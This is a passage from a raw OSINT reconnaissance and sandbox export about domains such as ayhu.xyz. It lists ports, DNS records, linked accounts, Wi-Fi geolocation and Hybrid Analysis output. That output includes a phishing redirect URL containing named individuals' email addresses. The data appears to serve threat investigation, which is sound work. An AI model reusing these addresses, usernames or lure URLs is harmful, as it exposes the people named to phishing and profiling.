3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Web Data]- [targetUID: 00000000-00006768]\n "data_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_0]- [targetUID: 00000000-00006768]\n "Tabs_13327998438932197" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Tabs_13327998438932197]- [targetUID: 00000000-00006768]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006768]\n "Diagnostic Data-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "5d847ab1-2881-4324-a2c6-29fe1a950926.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\5d847ab1-2881-4324-a2c6-29fe1a950926.tmp]- [targetUID: 00000000-00006768]\n "88a6edb1-7ca5-423a-948d-baf040324d05.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\88a6edb1-7ca5-423a-948d-baf040324d05.tmp]- [targetUID: 00000000-00006768]\n "a969316a-dad8-4b0d-bf02-210809eb9653.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\a969316a-dad8-4b0d-bf02-210809eb9653.tmp]- [targetUID: 00000000-00006768]\n "6086c4de-4b79-4b17-a9f3-0d813216df1c.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\6086c4de-4b79-4b17-a9f3-0d813216df1c.tmp]- [targetUID: 00000000-00006768]\n "be503e2a-334b-416d-8133-7309c5f020e8.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\be503e2a-334b-416d-8133-7309c5f020e8.tmp]- [targetUID: 00000000-00006768]\n "3da34e63-27c2-46cb-9277-75fa8ed92f1a.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\3da34e63-27c2-46cb-9277-75fa8ed92f1a.tmp]- [targetUID: 00000000-00006768]\n "ba18673a-06ca-42f2-836f-2b95dafc094e.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ba18673a-06ca-42f2-836f-2b95dafc094e.tmp]- [targetUID: 00000000-00006768]\n "8a917af9-8d36-4842-b176-78503ca8e5cb.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\8a917af9-8d36-4842-b176-78503ca8e5cb.tmp]- [targetUID: 00000000-00006768]\n "Network Action Predictor" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network Action Predictor]- [targetUID: 00000000-00006768]\n "Cookies" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies]- [targetUID: 00000000-00005860]\n "Network Action Predictor-journal" has type "SQLite Rollback Journal"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network Action Predictor-journal]- [targetUID: 00000000-00006768]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\shared_proto_db\\000003.log]- [targetUID: 00000000-00006768]\n "222527e1-3f73-4acc-a332-f69002db3178.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\222527e1-3f73-4acc-a332-f69002db3178.tmp]- [targetUID: 00000000-00006768]\n "f838898f-efdb-43ba-a200-ee2debfcb004.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\f838898f-efdb-43ba-a200-ee2debfcb004.tmp]- [targetUID: 00000000-00006768]\n "9fa1a642-dc59-4b5c-b3dc-8b2fdacab608.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\9fa1a642-dc59-4b5c-b3dc-8b2fdacab608.tmp]- [targetUID: 00000000-00006768]\n "7f4cd2f4-322e-419e-b872-153c4df2b660.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\7f4cd2f4-322e-419e-b872-153c4df2b660.tmp]- [targetUID: 00000000-00006768]\n "4add7271-5d67-4bc9-8ac7-d5d5845e9be7.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\4add7271-5d67-4bc9-8ac7-d5d5845e9be7.tmp]- [targetUID: 00000000-00006768]\n "Cookies-journal" has type "SQLite Rollback Journal"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies-journal]- [targetUID: 00000000-00005860]\n "History-journal" has type "SQLite Rollback Journal"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History-journal]- [targetUID: 00000000-00006768]\n "urlref_httpshassan-gamall.github.ionetflix" has type "HTML document UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Service Worker\\Database\\000003.log]- [targetUID: 00000000-00006768]\n "000004.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Session Storage\\000004.log]- [targetUID: 00000000-00006768]\n "0a0f3415-fbdd-4dcb-895f-bbcb036930f4.tmp" has type "ASCII text with very long lines with no line terminators"- L |
| 2023-05-12 03:09:45 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 135.97.148.34.bc.googleusercontent.com | 34.148.97.135 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | arpej (Net ID: 00:1A:2A:02:1A:E6) | 40.2024, 29.0398 |
| 2023-05-12 02:56:56 | Internet Name | No | DNS Resolver | 0 | 0 | 5 | 0 | None | www.ayhu.xyz | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f6071cb5443bc')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="IeJGNK1NlgODfmY5lM_CSOUsGpZRJayFri_EMqB7p9E-1683860063-0-AX4CepkLIrJBlYjsLY8SxaK3uwNGfYi_cI78cSgODaKEdDdhGruTJdLNKHipCAas1yRDoJa4jk3w7x3p7ckhzOJuKfeCo8jNUnP70adNIU5dZKa8JiOWBoI9SYK5Q_oq1Eks42yH_Pz5BuZ0QF6ODH2_k4pUMdjxKhGMZCyDKNM52sbeTu0IU1Z9_e1tCtOuH9J1aFZ2tonlXDc4g9zbIux7ExZ49kbKhnzKgiWBhIHUBpMYeWpuSJ_4qCfMlTT-uy5MHKpoVHLVBmCsQ5mELCsRXClDzOjpDkTqbSfAbh8hd0u6E9AsLVFq6mkA8uYgAs4nEqsUUv46GTcwvbzUbkKc1QJ8A2k0LYiOtqEyNozJ7I--u1pFreN-cf0BqBu1bjzjmjk9Ufw9C0rNxE7G3P6fqZnucT3KAI7GF68B4SHiO-kTUnp1udVECKZapa-19gQJJJtF13C6VjJjrQRVkch5xapdVTcSAJFESEO-EAMR9hDp7y8V-5vaHn6SIRKHs78Flbh2RF_P6lv_MAE36XjAyTTiidlaFqpS1ZnkznV7tCrGaYKNvXxibZ3SNtIzHvSSCizS-Sm2WncoqNtWFQZw4MSwC5gehOZvyL9OAj1SA9fWTQ-bfiW7LrZlzCWCJLIZUGG9pJVYCgum_TAJJVGfiljuO91NZvVvNyIgtAepbw2YAdNPwZ3YrRDL_1Un5U1kxz28HuDFJsvpLlTZSNRhPXl4BIx30MOZx9T7SUFWsCGh9uDL2bDPiBh0LSwqszBX0SLNJRo1MhT7IXGB7zy1gfVfFqqb3W0mfVcaymGtm5dqhUdBPRlb4wd_5_BMrKEUeZE1d8HDjjoyYLhvv36SD_5wRCbXxsfCdK2do3aGeM7O6LtZhGR0RuwOPFtRToqLDpM6HnWkxfbvRwTWbQt3gNfo6RJeaXs42GfGC6vMhv6-Zpdazh2C2qr1j5WGxsjVqAAnZQgtB_uAAZyLoW1Egawj2Dc9S-5JYlq2p44Cqz8kfn_HZzhJUPbd4OlAseBQZQfvTsxwQ8yBZFjNQTY6QE_0SDhUH44IwsfVzyg_qg2EOGimekLuWDzCGVBFHthTUHY_Uucg55yA_sEwBbcPwi19lZdxlJ7Akcrfm9Q1xTPYWqd3yg8TDkXwERtBie2ALa_sZMgXe5lFShstzVHZMFcNmZZ_Glu5XNCQGzZM4IALYOXDtzDzNfENL_KkCst225-oNpK1Rzcel6A6qrg383feNMfsfhR4f-t-0gjSgQcGjcMVuJSy33wzj3MyKMSAUAn1H3AU4KXx5l9gYHyPt3K2hXsw8kpaOC5iz5-tYdad463GleEPqMnQXyYze0-F-Kwpfaw0OW4xcwFgpJ7lUIa_Uo9RY1JgFEsKioyqNmIqHv90TnhF2xXyZtqCIT2zmPgDYc3GYmtDVDX3JH3IZ4Ue_9zw8eTUmmNzSLvHF-5-Jv1PvIxzwhsHdZ-9Y8a5xpT_YJ3ApVgxhBxQ9P11Ef3die91V-gWJ9blK7JyrAR97qvn0MVCh6Ipd0gUwoYP19FqAzVItOvoLt6KwAJ_P9BHXzn9V-Qn-K8E2u451f3eK9LuNMBNNeHTIZgwhKeDRKi_7YqSZEtSZBhservvl6AG5D792DbSptVg8teok3yfFJdmbmsVVtq_xMiFDR-JbWee4Xq5OGPEw-qzY3kVcZ3JGSH21pWSbawncJ1pZkYh_Y8uqWXqK_LHYCf1eZ4giUZOc1qNXVqD_66D8diNIgnlP3oGUHrBgTMOfZxq_Uhi6OAhZ7SG3lBy8EfeOsdCdZ3k3gkwd2BrqWGkSsiJCJw71aRSSLzklcMwO0t4rEGUoCt0P2QnnyFhBnAPmmU7bxfnvOSfNl67KcA670pAvXnjK5gtdmpWFLEQTKLiAxus6a1J55sB1jh2yyAgp9gU2TTlKH22JllQWbKYrEsbRrNjjaWTpuGgMUZEhABzykAV0_5Ryf5b1Iu8aB_yUQXLfxLOISB2J16hIkX9JBFDhB-K2iwT5AigiDsDn3kKx7Yn_RfRJoS2pRLWMZrIYAvnVYgYm9y81edopks9rnm7ZmUwgzO-G3g49daHSOyerkiJ0r3J8Okw4DK6PeI9iYnnJ3PuZHAUjE4lk_8MrIhAc4uYX4K1o-9Ke-xbpTbnl7jmdG3Gm-3L29y4tiQBKGjYgOtRk8-ysAEQVxg_UH3seGqQfmukY-uxgmHTqDedEdiiNc4iffnQwUfSPCDaUaRSMt4-JL4MYFn2fdPc4VcXOX79Z268m3iG4CyIoyIieiZJxKq5Fytf17H7DrAwzAK-7_cWORr2s0UVl6ksSgbwFTpGy4N__sJOF51dtXEfVEmWHx_Pzkw3X_pi-v5lATWE8lvwSB-TSiJYfQSJHSYYT6HXfaT1w6X76n4kq-ZrPPxvvJoJiND7W8ZhQjzgNr36p7jhZIQMiMAEzKgTQ4vmitfYqD4w00ar7uYe4W9UaptpqutZe32-rsetHK4f8sKgJ3CeKwcgiEQOluwAYjS5sFZ43pJ1k3hVEeYe7pLW">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '15631',
cRay: '7c5f6071cb5443bc',
cHash: '381065269fdd378',
cUPMDTk: "\/?__cf_chl_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'q4f4pOzDOU+B6AF/zMNZTtfQUbZJdschTcFNDOWKy7up/+mqaf8truQ2KKjt/rj9tsUJvHCPMl5JvfNuCtkhZqw35DYnRx8YzO+NZjtA29VORnsHbyexmRukxXhkj1aUs/dhLsS5lOlcBynQLv3fAojBSMTo2irKEDIydphKjwI16wTgar4SzVlH066rSHCeJ2lW9V/EzSyT6l7asFs9WGN+Z8UjlTPKJ0lqdL3pvuxM1sycw7k1OEGh4TEFk1Zi1Tm1qR0tz33CqvHEhqWe/r3r5anajxc1h5XZ6KT0dxZzvkI9kjdFbs/PTqH3OLzFqntntP1dLIyJxruw2vIIQVb+EG/QQudh3iW9ZP10B65ViMqC73osReO89Glx14C4rnxvY8OJhiGTBOtdj00LRx9JN+pPLlnlA0YFKm2eKJVsXMpv+GW4A4i2NhsMxRv/+0WJcnA98Fw7X4UhvaDcRzqVlcJrpcoGpX4b3ekLBWbuGttHibBiFb8Dx03xS+AEGjoHAFPYd/6bzsrrE8hANuLdxtuQ9vdmh2M9tUxqXUEa48P3yZ8gGXIpNOoU9aBv',
t: 'MTY4Mzg2MDA2My4wMDEwMDA=',
m: 'ku7Iuu8p9xCCueKE3I6e30hCT4pHjE58URs2150Qfj8=',
i1: 'MsbaNnnSVdv9s0jxu/qFPg==',
i2: 'D5L567ziFL3S1185dlxV3g==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f6071cb5443bc');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f6071cb5443bc';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.214): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:80 | 188.114.97.1 |
| 2023-05-12 03:32:02 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.2:8080 | 188.114.97.0/24 |
| 2023-05-12 03:36:42 | Physical Location | No | MetaDefender | 0 | 0 | 2 | 0 | None | Medellin, Colombia | 188.114.96.1 |
| 2023-05-12 02:44:24 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.109.153 |
| 2023-05-12 03:24:21 | HTTP Headers | No | Web Spider | 10 | 0 | 4 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} | https://ayhu.xyz/lol.html?__cf_chl_f_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:2087 | 172.67.135.9 |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | TF2 Backpack Examiner (Category: gaming)
http://www.tf2items.com/id/Battleb0t/ | Battleb0t |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | vsco (Category: social)
https://vsco.co/ayshoo/gallery | ayshoo |
| 2023-05-12 02:54:07 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:4700:3031::ac43:8709:80 | 2606:4700:3031::ac43:8709 |
| 2023-05-12 02:55:22 | Raw Data from RIRs | No | Google | 0 | 0 | 1 | 0 | None | {'webSearchUrl': u'https://www.google.com/search?q=site:battleb0t.xyz&aq=t&oe=utf-8&client=firefox-a&ie=utf-8&rls=org.mozilla%3Aen-US%3Aofficial', 'urls': ['https://battleb0t.xyz/']} | battleb0t.xyz |
| 2023-05-12 03:32:19 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.10:443 | 188.114.97.0/24 |
| 2023-05-12 02:49:17 | Raw Data from RIRs | No | Hybrid Analysis | 2 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://generalatlantic.com/astehnkuhl@generalatlantic.com%20https://site.php', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fgeneralatlantic.com%2Fastehnkuhl%40generalatlantic.com%20https%3A%2F%2Fllink.to%2F%3Fu%3Dhttps%3A%2F%2Fdev.protektnet.com%2FMNU%2Fgeneralatlantic.com%2Fjdenig%40generalatlantic.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_3f4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_3f4_IE_EarlyTabStart_0xe18_Mutex"\n "IsoScope_3f4_IESQMMUTEX_0_331"\n "IsoScope_3f4_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_3f4_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1012"\n "IsoScope_3f4_ConnHashTable<1012>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1012"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "172.66.43.150:443"\n "104.21.16.120:443"\n "35.186.254.174:443"\n "104.18.11.207:443"\n "172.67.71.45:443"\n "142.251.32.35:443"\n "172.217.12.99:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"1000logos.net"\n "api.salesflare.com"\n "stackpath.bootstrapcdn.com"\n "track.salesflare.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2019 Twitter, Inc." (Indicator: "twitter")\n "<a href="https://plus.google.com/107971784894043504000/" onclick="window.open(this.href);return false;"><i class="fa fa-google-plus"></i></a>" (Indicator: "plus.google.com")\n "<a href="https://twitter.com/nexcess" onclick="window.open(this.href);return false;"><i class="fa fa-twitter"></i></a>" (Indicator: "twitter")\n "<a href="https://www.facebook.com/nexcess" onclick="window.open(this.href);return false;"><i class="fa fa-facebook"></i></a>" (Indicator: "facebook.com")\n "<a href="https://www.linkedin.com/company/nexcess" onclick="window.open(this.href);return false;"><i class="fa fa-linkedin"></i></a>" (Indicator: "linkedin.com")\n "<a href="https://www.youtube.com/user/nexcessnet" onclick="window.open(this.href);return false;"><i class="fa fa-youtube"></i></a>" (Indicator: "youtube")\n "<p>Congrats on launching your new Website! Spread the good news: <a href="https://twitter.com/share" class="twitter-share-button" data-text="Just launched my new website with @Nexcess!" data-count="none">Tweet</a></p>" (Indicator: "twitter")\n "<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?\'http\':\'https\';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+\'://platform.twitter.com/widgets.js\';fjs.parentNode.insertBefore(js,fjs);}}(document, \'script\', \'twitter-wjs\');</script>" (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar102F.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1041.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab102E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1040.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "GJU2ZIBE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GJU2ZIBE.txt]- [targetUID: 00000000-00001012]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002472]\n "recaptcha__en_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "www.google_1_.xml" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "styles__ltr_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "~DF50FE3D0FF9FC6B92.TMP" has type "data"- Location: [%TEMP%\\~DF50FE3D0FF9FC6B92.TMP]- [targetUID: 00000000-00001012]\n "_5CF2F181-C1A8-11ED-AA3F-0800274CAE20_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._52546023-C1A8-11ED-AA3F-0800274CAE20_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "site_1_.htm" has type "HTML document ASCII text with no line terminators"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmEU9fBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.Roboto MediumRegularVersion 2.137; 2017Roboto-Me"- [targetUID: N/A]\n "FTU5WTPF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FTU5WTPF.txt]- [targetUID: 00000000-00001012]\n "KFOmCnqEu92Fr1Mu4mxP_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.RobotoRegularVersion 2.137; 2017Roboto-Regularht"- [targetUID: N/A]\n "llink_1_.htm" has type "HTML document ASCII text with no line terminators"- [targetUID: N/A]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "_A79A7ACA-C1A9-11ED-AA3F-0800274CAE20_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "5EL6UQQZ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5EL6UQQZ.txt]- [targetUID: 00000000-00002472]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-169', u'name': u'Found mail related domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed email domain:"!1,w)})},u).prototype.cr=function(){},u.prototype.xy=function(){this.mx.g().focus()},u.prototype.tt=function(w,z,u,r,e,z,y){return(r=((z=new a_((e=["api","payload",(u=void 